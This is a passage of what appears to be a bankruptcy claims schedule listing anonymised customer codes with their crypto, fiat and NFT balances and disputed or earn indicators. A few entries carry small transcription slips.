| 07425425 | | BTC[0], ETH[0], USD[3.95], USDT[40.71590801] | | |
| 07425426 | | USD[0.00], USDT[0] | | |
| 07425433 | | AAVE[.00010498], BAT[7.21574859], BRZ[7.16877514], CUSDT[17], DOGE[36.54602124], GRT[736.16329682], LINK[138.70902275], NEAR[205.93141356], SHIB[11], SOL[.00028887], SUSHI[0], TRX[23.55718814], UNI[.00012347], USD[0.00], USDT[6.24473286] | Yes | |
| 07425436 | | BTC[0.00353926], CUSDT[0], ETH[0], LINK[0], SOL[.00000001], USD[0.00] | Yes | |
| 07425437 | | BTC[.00391579], USD[0.00], USDT[1.09476354] | Yes | |
| 07425438 | | CUSDT[1], DOGE[1.82821257], USD[0.83] | | |
| 07425441 | | AVAX[.29102402], BCH[0.23214208], BTC[0.01342630], ETH[0.25871771], ETHW[0.25871771], USD[0.00], USDT[225.82875839] | | |
| 07425443 | | NFT (449337012906065220/Bahrain Ticket Stub #1711)[1] | | |
| 07425445 | | USD[0.00] | | |
| 07425446 | | ETH[0], SUSHI[0], TRX[.000003], USD[0.00], USDT[0] | | |
| 07425449 | | ETH[.00075], ETHW[.00075], USD[0.00] | | |
| 07425451 | | BAT[1], CUSDT[2], DOGE[4], ETH[0], GRT[2], TRX[5], USD[0.01] | | |
| 07425452 | | CUSDT[7], DOGE[2651.55131938], SHIB[9995974.98050324], SOL[5.22390465], TRX[2], USD[0.01] | | |
| 07425454 | | AAVE[0], BAT[5.36837974], BCH[0], BRZ[3], BTC[0], DOGE[3], ETH[0.00002937], ETHW[0.00002937], GRT[21478.52837930], KSHIB[0], LINK[0], LTC[0], MATIC[0.00007153], MKR[0.00007153], SOL[0.00000808], SUSHI[0], TRX[1], UNI[0.01383392], USD[0.12], USDT[12.98011217], YFI[0.00001575] | Yes | |
| 07425458 | | BTC[0], GRT[0], TRX[0], USD[10.32] | | |
| 07425460 | | USD[0.01], USDT[0] | Yes | |
| 07425467 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07425470 | | BRZ[1], CUSDT[12], DOGE[0], USD[0.00], USDT[0] | | |
| 07425473 | | BTC[0], ETHW[.046562], USD[2.13] | | |
| 07425475 | Contingent, Disputed | USD[0.80] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07425476 | | BRZ[3], CUSDT[14], DOGE[1.13137579], TRX[227.43059193], USD[0.01] | | |
| 07425481 | | CUSDT[2], DOGE[.09655481], USD[0.00] | | |
| 07425483 | | BTC[.00001468], USD[1.70] | | |
| 07425486 | | BAT[1.00257859], CUSDT[8], DOGE[5], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07425492 | | BRZ[0], CUSDT[0], DOGE[2], ETH[0], GRT[0], KSHIB[0], MATIC[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07425493 | | BAT[1.01655549], BRZ[6.52743959], CUSDT[19], DOGE[.00546809], TRX[4], USD[0.00] | Yes | |
| 07425494 | | BRZ[2], CUSDT[10], DOGE[0], LTC[0], NFT (44916162251419112/Entrance Voucher #3124)[1], SHIB[330547.58141716], TRX[124.05278575], USD[0.00] | Yes | |
| 07425497 | | BRZ[1], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07425498 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07425501 | | DOGE[2781.30428327], USD[0.06] | | |
| 07425503 | | DOGE[1.83161962], USD[0.02] | | |
| 07425505 | | BTC[0], TRX[0], USD[0.02] | | |
| 07425511 | | ETH[.00000001], USD[0.85] | | |
| 07425512 | | BF_POINT[300] | | |
| 07425513 | | DOGE[0], TRX[3.99620000], USD[0.01], USDT[0] | | |
| 07425517 | | BAT[3.68067129], BRZ[6], CUSDT[2], DAI[.07437879], EUR[0.08], USD[5.23], USDT[0] | | |
| 07425520 | | DOGE[3951.24186625], TRX[1], USD[0.00], USDT[1] | | |
| 07425528 | | BTC[0.00517647], DOGE[0], ETH[0.06824253], ETHW[0.06739437], LINK[0], LTC[0], MATIC[1053.86185091], SOL[16.92324110], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07425529 | | USD[5.50] | | |
| 07425535 | | AVAX[28.6693], DOGE[2770.227], ETHW[.247444], LTC[3.26144858], SOL[.75597151], TRX[5056.938], USD[1.82], USDT[0] | | |
| 07425536 | | BTC[.08941814], CUSDT[1], DOGE[118.52762119], ETH[.3650542], ETHW[.36490102], SOL[1.02793029], TRX[3.00471846], USD[215.05] | Yes | |
| 07425542 | | USDT[9.77453236] | | |
| 07425546 | | USD[68.85] | | |
| 07425556 | | USD[1.75] | | |
| 07425559 | | SOL[0], USD[0.00] | | |
| 07425562 | | BAT[.00515257], CUSDT[25.29806036], DOGE[1], USD[0.00] | | |
| 07425567 | | USD[0.00] | | |
| 07425569 | | AVAX[.01104], ETH[.00077178], ETHW[0.00077177], USD[2140.59], USDT[2.789934] | | |
| 07425573 | Contingent, Unliquidated | BTC[0.00003730], USD[0.01] | | |
| 07425575 | | BTC[.001991], CUSDT[1], DOGE[12924.42495817], USD[0.00] | | |
| 07425580 | | USD[2.46] | | |
| 07425592 | | BRZ[1], CUSDT[10], DOGE[3], ETH[.52145768], ETHW[.52123396], SOL[.00000527], SUSHI[27.09454986], TRX[3.76565718], USD[0.00], USDT[0] | Yes | |
| 07425597 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07425599 | | USD[0.00] | | |
| 07425602 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], NFT (320742088492649603/Winds of Sorrow)[1], NFT (431647399709212598/Jamie vs Daenerys)[1], SHIB[1131423.79798490], TRX[0], USD[0.00] | Yes | |
| 07425614 | | CUSDT[2], DOGE[669.20365374], USD[0.00] | Yes | |
| 07425615 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07425617 | | BRZ[281.12846991], CUSDT[2287.09340520], DOGE[0], SHIB[1], TRX[0], USD[57.97] | | |
| 07425618 | | BRZ[1], CUSDT[1], USD[0.64] | | |
| 07425619 | | CUSDT[3], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07425622 | | SOL[40.04542197], TRX[1], USD[0.00] | Yes | |
| 07425623 | | CUSDT[1], USD[114.75], USDT[0] | | |
| 07425625 | | BRZ[2], BTC[.01295643], CUSDT[8], DOGE[7549.5227215], SHIB[2], TRX[2974.27944473], USD[0.00] | | |
| 07425627 | | USD[0.00] | | |
| 07425632 | | ETH[.00110583], ETHW[.00110583], USD[0.00] | | |
| 07425636 | | NFT (456419988558960545/New York City)[1] | | |
| 07425637 | | CUSDT[1], DOGE[97.95611631], SOL[4.41083167], USD[0.59], USDT[0.00000001] | | |
| 07425638 | | USD[0.00] | | |
| 07425640 | | CUSDT[1], DOGE[447.54823454], ETH[.07131983], ETHW[.07131983], TRX[1], USD[0.00] | | |
| 07425652 | | DOGE[0], ETH[0], KSHIB[0], SHIB[0], USD[0.00] | Yes | |
| 07425662 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07425668 | | BRZ[1], CUSDT[1], DOGE[826.04712637], ETH[.08579082], ETHW[0.08476405], SHIB[2], SOL[35.04126309], TRX[2], USD[0.00] | Yes | |
| 07425672 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07425675 | | USD[3.60] | | |
| 07425676 | | BAT[2], BRZ[5], CUSDT[1], DOGE[9181.69389399], GRT[1], TRX[2], USD[0.00] | | |
| 07425682 | | BTC[.06260854], TRX[1], USD[0.00], USDT[1] | | |
| 07425688 | | DOGE[44.95725], ETHW[.41224025], USD[20.00] | | |
| 07425692 | | BF_POINT[300], BRZ[1], BTC[.053088], CUSDT[2], DOGE[10880.62651755], GRT[1], LINK[9.34373233], SOL[9.78344311], SUSHI[11.05031819], TRX[3], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07425694 | | TRX[.011331], USD[0.00], USDT[0.00000001] | | |
| 07425695 | | DOGE[1], LTC[0], SOL[0], USD[0.04] | | |
| 07425697 | | AAVE[.0926647], CUSDT[4], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07425702 | | DOGE[2226.33472372], USD[0.00] | | |
| 07425703 | | CUSDT[5], DOGE[4], SOL[.46926657], TRX[4], USD[61.24], USDT[1] | | |
| 07425704 | | CUSDT[1], DOGE[797.28535655], USD[0.69] | Yes | |
| 07425714 | | SOL[.01639], USD[0.81] | | |
| 07425718 | | DOGE[104.4128], ETH[.040959], ETHW[.040959], LTC[.66382068], SOL[5.68442162], TRX[260.739], USD[51.52], USDT[0.00000001] | | |
| 07425719 | | BRZ[1], CUSDT[3], SHIB[607338.15734765], USD[0.00] | | |
| 07425726 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07425727 | | CUSDT[4], DOGE[62.81476508], USD[0.00] | | |
| 07425730 | | BAT[19.54565212], BTC[.00035795], DOGE[2], USD[0.00] | | |
| 07425733 | | BRZ[5.07952967], BTC[0], CUSDT[23], DOGE[0], TRX[5], USD[95.18] | Yes | |
| 07425734 | | BRZ[313.33481749], CUSDT[2], DOGE[560.44613219], GRT[606.81323536], SUSHI[43.23620628], TRX[6773.68817635], USD[0.43] | Yes | |
| 07425740 | | BRZ[1], CUSDT[3], TRX[80.69774352], USD[0.01] | Yes | |
| 07425743 | | ETH[0] | | |
| 07425744 | | BTC[0.72939507], SOL[.00883], USD[33.37] | | |
| 07425747 | | BRZ[1], DOGE[312.18109725], USD[0.00] | | |
| 07425755 | | BRZ[2], BTC[0], CUSDT[3], DOGE[0], ETH[.00000032], ETHW[.00000032], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07425758 | | BTC[.00895697], CUSDT[4], DOGE[0], ETH[1.17718208], ETHW[1.17670919], MATIC[62.96878371], SHIB[2], SOL[0.00001239], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07425777 | | BCH[0], BTC[0], DOGE[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07425783 | | CUSDT[1], DOGE[0], SOL[0], USD[0.00], USDT[0] | | |
| 07425787 | | BRZ[2], BTC[.04434187], CUSDT[2], DOGE[11092.49566125], GRT[1], MATIC[367.83958106], SHIB[21975393.4969978], SOL[6.1507046], TRX[4223.56364897], UNI[8.62483263], USD[0.00], USDT[1.05256774] | Yes | |
| 07425790 | | ETHW[.137], USD[0.30] | | |
| 07425791 | | BTC[0.00000001] | | |
| 07425793 | | BTC[0], SOL[0.00000001], USD[0.00] | | |
| 07425795 | | DOGE[.496], LTC[.00908], SOL[.0531], USDT[0] | | |
| 07425808 | | MATIC[60], NFT[31152546601614449/Entrance Voucher #29505][1], TRX[54.904], USD[0.04] | | |
| 07425809 | | BTC[.3729], DOGE[1.04933748], ETH[1.16142555], ETHW[1.16142555], SOL[95.24653708], SUSHI[.3407], USD[2760.59] | | |
| 07425813 | | USD[0.01] | Yes | |
| 07425822 | | DOGE[2433.47943215], USD[0.00] | | |
| 07425824 | | BTC[.0002], USD[0.11], USDT[2.80701574] | | |
| 07425827 | | BAT[2.12004889], BRZ[1], CUSDT[4], TRX[2], USD[0.01], USDT[4.41531534] | | |
| 07425833 | | CUSDT[10], DOGE[3], SHIB[558581.38034427], TRX[1], USD[0.01] | Yes | |
| 07425836 | | USD[0.00] | | |
| 07425837 | | DOGE[1.316], USD[1.09], USDT[0.00000001] | | |
| 07425838 | | DOGE[1], GRT[1.00404471], TRX[2], USD[0.00] | Yes | |
| 07425842 | | USD[9.00] | | |
| 07425846 | | BTC[.00000228], DOGE[46.03811762], LINK[1.04338015], NFT[413798056386600526/Entrance Voucher #1941][1], SHIB[1], USD[0.00], USDT[1.04301801] | Yes | |
| 07425848 | | AAVE[.04995], USD[0.56] | | |
| 07425849 | | SOL[.07], USD[0.01] | | |
| 07425852 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07425854 | | CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07425856 | | DOGE[3], TRX[1], USD[0.01] | | |
| 07425858 | | DOGE[.992], USD[0.20], USDT[0.68476043] | | |
| 07425862 | | BTC[0], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07425863 | | USD[0.00] | | |
| 07425867 | | USD[0.00] | | |
| 07425871 | | BAT[2.08840205], BRZ[2], CUSDT[2], DOGE[1], ETHW[3.85396028], GRT[.19103215], SHIB[1], SOL[0], TRX[4], USD[0.00] | Yes | |
| 07425872 | | USD[0.00], USDT[0.00000006] | | |
| 07425875 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07425877 | | BTC[0], ETH[0], USD[0.00] | | |
| 07425878 | | USD[0.00] | | |
| 07425881 | | CUSDT[1], USD[0.01] | | |
| 07425883 | | CUSDT[1], SUSHI[67.2485503], USD[530.53] | Yes | |
| 07425886 | | BF_POINT[200], NFT[487869314715043138/FTX - Off The Grid Miami #1476][1] | Yes | |
| 07425895 | | SOL[0], USD[0.00] | | |
| 07425901 | | BRZ[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07425906 | | CUSDT[1], ETH[.03895049], ETHW[.03846953], TRX[1], USD[0.00] | Yes | |
| 07425913 | | BAT[0], BTC[0], CUSDT[9], ETH[0], GRT[30.83735833], KSHIB[4.92788804], TRX[1], USD[0.01], USDT[0.00005712] | | |
| 07425914 | | DOGE[7976.44857464], SHIB[1], USD[550.00], USDT[0.00000001] | Yes | |
| 07425917 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07425920 | | NFT (526798507942639254/SBF Hair & Signature #4 #57)[1], TRX[.000145], USD[.01] | | |
| 07425923 | | DOGE[2], USD[0.00] | Yes | |
| 07425925 | | NFT (373772797694563156/Warriors 75th Anniversary City Edition Diamond #1074)[1], NFT (471608816449444680/Warriors 75th Anniversary Icon Edition Diamond #1777)[1] | | |
| 07425927 | | AVAX[22.94662015], BRZ[11.48932103], BTC[.00217808], CUSDT[63.09163135], DOGE[18334.30606155], ETH[.41155835], ETHW[.31353631], GRT[1], LTC[5.53749711], MATIC[592.72052308], SHIB[101501593.20186751], SOL[3.20852613], TRX[44.887709], USD[10.00], USDT[1.02543197], YFI.16518235] | Yes | |
| 07425929 | | BAT[1.01454291], BRZ[1], CUSDT[14], DOGE[2], ETH[.01689522], ETHW[.01669002], SHIB[1], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07425940 | | TRX[.000003] | | |
| 07425944 | | DOGE[1], NFT (403672163768092032/KEYKARD 007)[1], USD[0.21] | | |
| 07425947 | | USD[0.00] | | |
| 07425948 | | DOGE[1], TRX[1], USD[0.71] | | |
| 07425949 | | TRX[1443.80974159] | | |
| 07425951 | | BRZ[1], BTC[0], CUSDT[3], DOGE[0], ETH[0], PAXG[0], TRX[4], USD[0.00] | | |
| 07425953 | | BRZ[12.13210331], CUSDT[3], DOGE[0], TRX[1] | Yes | |
| 07425961 | | CUSDT[4], DOGE[349.97384109], ETH[.01545554], ETHW[.01545554], USD[0.00] | | |
| 07425962 | | CUSDT[6], DOGE[3], PAXG[.09443279], SUSHI[19.78880072], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07425976 | | CUSDT[1], DOGE[.07613207], USD[0.01] | | |
| 07425981 | | BTC[0], CUSDT[4], DOGE[0], USD[0.00] | | |
| 07425987 | | CUSDT[2], DOGE[2], USD[0.00] | Yes | |
| 07425991 | | ETH[.00000006], ETHW[.00000006], SHIB[6], TRX[1], USD[0.00] | Yes | |
| 07425994 | | CUSDT[5], DOGE[3481.82518642], TRX[1], USD[0.01] | Yes | |
| 07425996 | | CUSDT[1], DOGE[331.82649469], TRX[1], USD[0.01] | | |
| 07425999 | | USD[125.48] | | |
| 07426000 | Contingent, Disputed | ETH[.00085119], ETHW[.00085119], LINK[1], USD[275.68] | | |
| 07426002 | | DOGE[4], LTC[.48934214], SOL[.00002348], TRX[1849.70323635], USD[593.55], USDT[1] | | |
| 07426005 | | BRZ[2], CUSDT[7], USD[0.00] | | |
| 07426011 | | USD[0.55] | | |
| 07426015 | | USD[0.00], USDT[0] | | |
| 07426018 | | CUSDT[2], DOGE[3], TRX[2], USD[0.00] | | |
| 07426019 | Contingent, Disputed | DOGE[3.17963143], SUSHI[0], USD[0.00] | | |
| 07426023 | | TRX[.000004], USD[1.98], USDT[0.00000026] | | |
| 07426028 | | USD[0.00] | | |
| 07426033 | | ETH[.12506291], ETHW[.12506291], SOL[15.811487], USD[0.00] | | |
| 07426042 | | SOL[1] | | |
| 07426043 | | BTC[0], DOGE[0], ETH[0], LTC[0], USD[0.00], USDT[0] | Yes | |
| 07426044 | | BRZ[7.72017182], CUSDT[14], DOGE[1035.02831183], GRT[1.00464076], LTC[.00000498], TRX[3], USD[7.04], USDT[1.1028817] | Yes | |
| 07426049 | | BRZ[1], CUSDT[6], DOGE[0], GRT[1], TRX[2], USD[0.01] | | |
| 07426052 | | SOL[9.986] | | |
| 07426058 | | BTC[0], DAI[0], DOGE[0], EUR[0.00], SGD[0.00], USD[0.00] | | |
| 07426062 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07426067 | | BTC[.00616328], LINK[.2997], LTC[.1118], SOL[9.18157583], SUSHI[4.995], USD[0.00] | | |
| 07426073 | | CUSDT[2202.30750585], DOGE[928.17491591], SOL[2.24902754], SUSHI[5.06063285], USD[0.00] | | |
| 07426076 | | BRZ[2], CUSDT[2], DOGE[.00004627], SHIB[3906.63538691], TRX[1], USD[0.00] | Yes | |
| 07426079 | | CUSDT[2], DOGE[1], MATIC[109.31005278], SHIB[3], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07426082 | | DOGE[21.45701019] | | |
| 07426083 | | BRZ[4], CUSDT[8], DOGE[438.49896444], GRT[2.050115], SHIB[2053896.04618743], SUSHI[0], TRX[3], USD[0.00] | Yes | |
| 07426087 | | USD[0.01] | | |
| 07426094 | | USD[0.00], USDT[.09176734] | | |
| 07426097 | | SOL[.00000001], USD[0.82] | | |
| 07426098 | | BRZ[1], CUSDT[4], DOGE[566.63999684], ETH[.02402425], ETHW[.02402425], TRX[1], USD[133.97] | | |
| 07426101 | | BAT[4], BRZ[9], CUSDT[10], DOGE[7607.42377285], ETH[1.67997943], ETHW[1.67997943], GRT[1], SOL[24.26273189], TRX[11], USD[0.00], USDT[2] | | |
| 07426103 | | BAT[241.7139994], CUSDT[1], DOGE[4], SOL[3.69171296], TRX[3], USD[3.24] | | |
| 07426105 | | BRZ[1], BTC[.00341606], CUSDT[26], ETH[.05417683], ETHW[.05417683], TRX[5], USD[14.46] | | |
| 07426112 | | BAT[400.07595718], BCH[.74591747], BRZ[5462.93632609], CUSDT[25806.19340371], DOGE[2358.9228405], TRX[9869.6175388], USD[250.00], USDT[1] | | |
| 07426113 | | BTC[0], CUSDT[4], DOGE[.00153517], SHIB[1], USD[0.00], USDT[0.00007542] | Yes | |
| 07426121 | | AVAX[.68679624], BRZ[2], BTC[0.04447431], CUSDT[10], DOGE[3], ETH[.05308737], ETHW[.04237627], GRT[8.6406852], LTC[0], MATIC[25.46543593], SHIB[25], SOL[0.29338482], SUSHI[1.07613795], USD[17.54], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07426124 | | CUSDT[4], DOGE[4434.66370275], SHIB[6531391.41270297], TRX[3], USD[0.00], USDT[1.10864761] | Yes | |
| 07426125 | | CUSDT[2], DOGE[.02495518], TRX[1], USD[0.00] | | |
| 07426127 | | DOGE[78.53018162], USD[19.18], USDT[0] | | |
| 07426134 | | BAT[1], CUSDT[8], DOGE[6], ETH[.00000001], ETHW[0], TRX[1], USD[0.01] | | |
| 07426135 | | ETH[0], ETHW[0], MATIC[0], SHIB[1], USD[183.38], USDT[0.00000001] | Yes | |
| 07426139 | | LTC[.0098386], USD[0.00] | | |
| 07426143 | | BRZ[1], BTC[.00000002], CUSDT[2], DOGE[.00791235], TRX[2], USD[656.49] | | |
| 07426150 | | NFT (330763482648699037/FTX - Off The Grid Miami #484)[1] | | |
| 07426151 | | USD[10.00] | | |
| 07426155 | | CUSDT[1], USD[0.00] | | |
| 07426160 | | BCH[0], DOGE[2], USD[0.01] | | |
| 07426161 | | BAT[.315], DOGE[.579], USD[0.00], USDT[3.25737021] | | |
| 07426162 | | DOGE[1], LINK[0.49484218] | | |
| 07426163 | | BAT[60.56670056], BTC[.00293683], CUSDT[4], DOGE[7.37733288], ETH[0.12495604], ETHW[0.12380771], LINK[.34167869], UNI[.45071641], USD[0.00] | Yes | |
| 07426166 | | BTC[0], SOL[0], USD[0.00] | | |
| 07426168 | | BRZ[.0183216], CUSDT[.21720744], DOGE[1096.34269284], GRT[1], SHIB[6218102.71695659], SOL[5.95959724], TRX[.1151031], USD[3987.44] | Yes | |
| 07426169 | | ETH[.00000001], NFT (499094504404364336/2974 Floyd Norman - CLE 2-0228)[1], NFT (514612187676845574/Imola Ticket Stub #1812)[1], SOL[0], USD[0.00], USDT[0.00000056] | | |
| 07426170 | | BRZ[1], DOGE[3.00001949], GRT[1], TRX[4], USD[0.00] | | |
| 07426174 | | BAT[401.50058054], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07426175 | | CUSDT[1], TRX[1.00001697], USD[0.00] | | |
| 07426176 | Contingent, Unliquidated | ALGO[.999], CUSDT[1], DOGE[0], ETHW[.09068662], LINK[5.09767354], TRX[144.46424686], USD[21.21], USDT[0.17212512] | Yes | |
| 07426186 | | USD[0.00] | | |
| 07426188 | | TRX[.000002], USD[0.00], USDT[.004923] | | |
| 07426190 | | CUSDT[1], USD[0.00], USDT[0] | Yes | |
| 07426191 | | BTC[0.00000492], ETHW[.00059936], LTC[0], SOL[.00000001], USD[0.98], USDT[0.24782387] | | |
| 07426193 | | BRZ[1], CUSDT[4], DOGE[0], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07426198 | | BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07426200 | | USD[34.01] | | |
| 07426202 | | BRZ[3], BTC[0], DOGE[401.61020478], ETH[0], ETHW[3.04731549], GRT[1844.68203179], LINK[0.00032551], MATIC[0.00816074], SHIB[29], SOL[2.50286223], TRX[8.00001], UNI[28.26615791], USD[1.14], USDT[2.05578785] | Yes | |
| 07426204 | | USD[0.00] | | |
| 07426208 | | USD[0.00] | | |
| 07426210 | | SOL[0], USDT[0] | | |
| 07426213 | | BRZ[3], DOGE[392.25906218], TRX[1], USD[0.00] | | |
| 07426216 | | LTC[.00819343], USD[0.00], USDT[0.00076660] | | |
| 07426221 | | DOGE[1], USD[0.00] | | |
| 07426228 | | USD[0.01] | | |
| 07426229 | | BRZ[1], CUSDT[3], DOGE[1.91605424], SHIB[1431463.27356853], USD[0.03] | | |
| 07426230 | | BRZ[2], BTC[0], CUSDT[5], DOGE[0], TRX[5], USD[0.01] | | |
| 07426234 | | BAT[1], BRZ[3], CUSDT[5], DOGE[1], TRX[8], USD[0.00], USDT[2] | | |
| 07426241 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07426243 | | BAT[3.28865991], BRZ[1], DOGE[3], ETH[.00000001], GRT[2.00489919], LINK[1.10674174], SOL[161.04929368], SUSHI[1.1064587], TRX[2], USD[0.00], USDT[4.33078004] | Yes | |
| 07426247 | | USD[0.00] | | |
| 07426264 | | BAT[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], EUR[0.00], GRT[0], KSHIB[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01] | Yes | |
| 07426264 | | DOGE[4315.72885758], ETH[.02868387], ETHW[.02868387], TRX[1], USD[0.00], USDT[0.00000896] | | |
| 07426268 | | CUSDT[1], DOGE[2500.13877474], TRX[1], USD[0.07] | | |
| 07426273 | | DOGE[193.806], USD[0.11] | | |
| 07426278 | | ETH[0], LINK[12.13733933], LTC[1.57713608], MATIC[121.58885312], SHIB[389212.50932309], SOL[10.55927331], TRX[0], USD[301.16], USDT[0] | Yes | |
| 07426279 | | ALGO[.247], BTC[0], ETH[.0006976], ETHW[0.00069760], SOL[0.00924019], USD[0.00], USDT[0] | | |
| 07426287 | | SOL[0], USDT[0] | | |
| 07426295 | | SOL[560.98880764], USDT[0.00000009] | | |
| 07426299 | | BRZ[1], DOGE[1], ETH[.00000243], ETHW[.00000243], GRT[1], SHIB[3], TRX[1], USD[0.00] | Yes | |
| 07426303 | | SHIB[1], USD[0.01] | | |
| 07426305 | | ETH[.57728455], SHIB[3], USD[0.34], USDT[0] | Yes | |
| 07426306 | | BAT[13.74488159], BRZ[1], BTC[.00144579], CUSDT[526.23267759], DOGE[1.00009895], LINK[1.69900689], PAXG[.00942601], SHIB[21455.85230267], TRX[470.49108063], USD[0.00] | Yes | |
| 07426307 | | CUSDT[3], DOGE[3], ETH[.00316516], ETHW[.00312409], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07426314 | | BAT[1], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07426315 | | BF_POINT[100], DOGE[0], ETH[.02672459], ETHW[.01831755], USD[16.21] | | |
| 07426317 | | BTC[0.13879513], KSHIB[0], SHIB[2], SOL[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07426328 | | BAT[77.41400542], BF_POINT[300], BRZ[2], CUSDT[10], MATIC[24.90034295], SOL[15.67655571], TRX[12509.58848293], USD[0.57], USDT[0] | Yes | |
| 07426338 | | GRT[1], TRX[1], USD[0.01] | | |
| 07426342 | | BAT[1], DOGE[2], USD[0.00] | | |
| 07426343 | | AAVE[.00357462], AUD[3.82], BAT[2.47638733], BCH[.0018314], BRZ[125.72185479], BTC[.00001685], CAD[2.46], CUSDT[48.19120318], DAI[2.97341571], DOGE[94.43897454], ETH[.00054135], ETHW[.00054135], EUR[0.83], GBP[0.71], GRT[.56490645], LINK[.03296149], LTC[.05489427], MATIC[.83272568], MKR[.00040885], PAXG[.00056214], SGD[1.33], SLL[.06956285], SUSHI[.04940107], TRX[18.26932492], UNI[.06211624], USD[0.00], USDT[2.98451472], YFI[.00063204] | | |
| 07426345 | | BAT[1], BRZ[5], BTC[.00257191], CUSDT[13], SHIB[1], TRX[9], USD[0.00] | | |
| 07426348 | | NFT [54033668248470765/Entrance Voucher #4787][1] | | |
| 07426359 | | DOGE[186.15580443], USD[0.00] | Yes | |
| 07426373 | | BTC[0], USD[0.00] | | |
| 07426374 | | BAT[1], CUSDT[2], TRX[1], USD[0.00] | | |
| 07426378 | | BAT[18.52468733], BTC[.03566032], DOGE[177.05924751], ETH[.08764753], ETHW[.086621], SOL[20.43918731], TRX[1], UNI[3.31925588], USD[0.59] | Yes | |
| 07426380 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07426385 | | BRZ[1], CUSDT[3], DOGE[618.65190835], ETH[.05997877], ETHW[.05923458], LINK[8.3709853], USD[0.00] | Yes | |
| 07426391 | | BRZ[1], CUSDT[1], LTC[0], TRX[3.000013], USD[0.00], USDT[0] | Yes | |
| 07426392 | | USD[0.00] | Yes | |
| 07426393 | | BTC[0], DOGE[2], LTC[.0013724], TRX[0], USD[0.00] | | |
| 07426395 | | BAT[0], BTC[0], DOGE[0], MATIC[24.42276657], USD[0.01], USDT[0.00004642] | | |
| 07426397 | | BRZ[8.75170586], CUSDT[50.43273269], DOGE[.00729794], SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07426399 | | USD[0.00] | | |
| 07426405 | Contingent, Disputed | CUSDT[1], USD[0.00] | | |
| 07426412 | | DOGE[0], USD[0.00] | | |
| 07426414 | Contingent, Disputed | BTC[0.00001644], USD[0.00], USDT[.0077752] | | |
| 07426418 | | USD[0.00] | | |
| 07426422 | | BTC[0], LTC[0], NFT [37550858162142528B/FTX - Off The Grid Miami #1917][1], USD[0.00], USDT[0] | | |
| 07426423 | | SOL[.0999], USD[0.07] | | |
| 07426424 | | ETHW[3.156524], NEAR[376.29007423], USD[301.89] | | |
| 07426425 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[1874.43], USDT[0] | | |
| 07426434 | | NFT [335028506973804695/FTX - Off The Grid Miami #185][1], NFT [406625528796821563/Entrance Voucher #3381][1], NFT [452696906093548960/Humpty Dumpty #1073][1], NFT [458429450282310843/Australia Ticket Stub #1152][1], NFT [492639830890079324/Shaq's Fun House Commemorative Ticket #149][1], USD[21.28] | | |
| 07426436 | Contingent, Disputed | ETH[.00000001] | | |
| 07426438 | | NFT [415997796636364073/Miami Ticket Stub #774][1], USD[0.00] | | |
| 07426440 | | NFT [456478235115636688/Aku World Avatar #46][1], USD[100.00] | | |
| 07426441 | | ETH[.0000820T], ETHW[0.00008206], NFT [300223527974987365/StarAtlas Anniversary][1], NFT [314511742251032100/StarAtlas Anniversary][1], NFT [320734370992998378/StarAtlas Anniversary][1], NFT [379819719343383854/Microphone #328][1], NFT [430716668352567057/StarAtlas Anniversary][1], NFT [457507466669495505/StarAtlas Anniversary][1], NFT [459247596643196321/StarAtlas Anniversary][1], NFT [474994306673291478/StarAtlas Anniversary][1], USD[1.92] | | |
| 07426442 | | ETHW[.598401], USD[1.50] | | |
| 07426443 | | USD[0.01] | Yes | |
